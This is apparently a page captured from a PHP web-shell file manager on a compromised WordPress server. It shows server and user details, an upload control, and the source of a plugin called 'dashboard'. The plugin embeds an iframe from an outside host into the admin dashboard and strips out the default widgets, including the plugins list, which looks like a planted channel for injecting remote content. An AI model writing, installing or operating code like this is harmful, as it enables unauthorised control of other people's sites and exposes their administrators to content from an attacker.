HEX
Server: Apache/2.4.6 () OpenSSL/1.0.2k-fips PHP/8.3.8
System: Linux gateway.rmc-logistics.net 4.1.12-124.48.6.el7uek.x86_64 #2 SMP Tue Mar 16 14:57:50 PDT 2021 x86_64
User: apache (48)
PHP: 8.3.8
Disabled: NONE
Upload Files
File: //var/www/rmc-logistics.net/wp-content/plugins/dashboard.php
<?php
/*
Plugin Name: dashboard
Plugin URI: http://www.site-4you.ru/
Description: dashboard
Author: i
Version: 10.02A
Author URI: http://www.site-4you.ru/
*/




function a_site4you_dashboard_widget() {
   echo '<iframe src="http://site-4you.ru/wp-content/plugins/dashboard/file.html" width="100%" height="400px"></iframe>';
}


function add_custom_dashboard_widget() {
    wp_add_dashboard_widget('a_site4you_dashboard_widget', 'Сайт для вас', 'a_site4you_dashboard_widget');
}
add_action('wp_dashboard_setup', 'add_custom_dashboard_widget');



function disable_default_dashboard_widgets() {
 
    remove_meta_box('dashboard_right_now', 'dashboard', 'core');
    remove_meta_box('dashboard_recent_comments', 'dashboard', 'core');
    remove_meta_box('dashboard_incoming_links', 'dashboard', 'core');
    remove_meta_box('dashboard_plugins', 'dashboard', 'core');
    remove_meta_box('dashboard_quick_press', 'dashboard', 'core');
    remove_meta_box('dashboard_recent_drafts', 'dashboard', 'core');
    remove_meta_box('dashboard_primary', 'dashboard', 'core');
    remove_meta_box('dashboard_secondary', 'dashboard', 'core');
}

add_action('admin_menu', 'disable_default_dashboard_widgets');



?>